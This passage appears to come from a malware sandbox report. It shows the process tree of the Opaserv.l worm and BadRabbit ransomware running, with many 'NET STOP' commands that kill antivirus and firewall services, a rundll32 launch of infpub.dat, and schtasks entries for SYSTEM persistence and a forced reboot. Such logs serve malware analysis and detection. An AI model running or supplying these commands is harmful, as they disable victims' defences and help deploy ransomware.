                                                                                                                                                                                                                                                                                  NET STOP PERSFW
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:6776
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:7996
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                      NET STOP AVPCC
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:6812
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:8128
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                          NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:6868
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:8056
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                              NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:6904
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:7792
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                  NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:7628
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:7800
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                      NET STOP PERSFW
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:6392
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:3912
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                          NET STOP AVPCC
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:7368
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:5948
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                              NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:7532
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:2284
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                  NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:7476
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:1228
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                  PID:8016
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                    NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                    PID:5784
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                      PID:6952
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                    NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                    PID:3216
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:6744
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                      NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                      PID:5284
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                        PID:6164
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                      NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                      PID:5956
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                        PID:6792
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                      NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                      PID:4792
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:7072
                                                                                                                                                                                                                                                                                                                      • C:\WINDOWS\system\msload.exe
                                                                                                                                                                                                                                                                                                                        C:\WINDOWS\system\msload.exe
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:6668
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                            NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:7004
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:7684
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:7052
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:8020
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                    NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:7068
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:7744
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                        NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:7104
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:8164
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                            NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:7140
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8080
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6356
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                    NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7116
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2856
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                        NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7244
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:7784
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                            NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6928
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7388
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6948
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2336
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                    NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:7400
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7404
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                        NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8064
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6356
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                            NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4640
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7416
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6972
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7556
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                    NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5488
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:228
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                        NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6644
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6328
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                            NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6532
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6560
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6692
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6496
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                    NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7128
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7444
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                        NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3520
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6460
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                            NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4112
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6928
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5924
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3940
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7812
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6392
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7404
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7916
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6356
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7244
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                NET STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7084
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP NAVAPSVC
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3080
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    NET STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\net1 STOP PERSFW
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4724
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        NET STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6636
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\net1 STOP AVPCC
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7120
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            NET STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4372
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\net1 STOP MCSHIELD
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6008
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\NET.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                NET STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6672
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\net1 STOP SWEEPSRV.SYS
                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\BadRabbit.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7232
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7440
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        /c schtasks /Delete /F /TN rhaegal
                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7752
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /Delete /F /TN rhaegal
                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7976
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 4095052998 && exit"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 4095052998 && exit"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7472
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:11:00
                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 16:11:00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7232
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\7B26.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\7B26.tmp" \\.\pipe\{0DB19643-8ABE-4764-AC2E-1BA73B5E433C}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
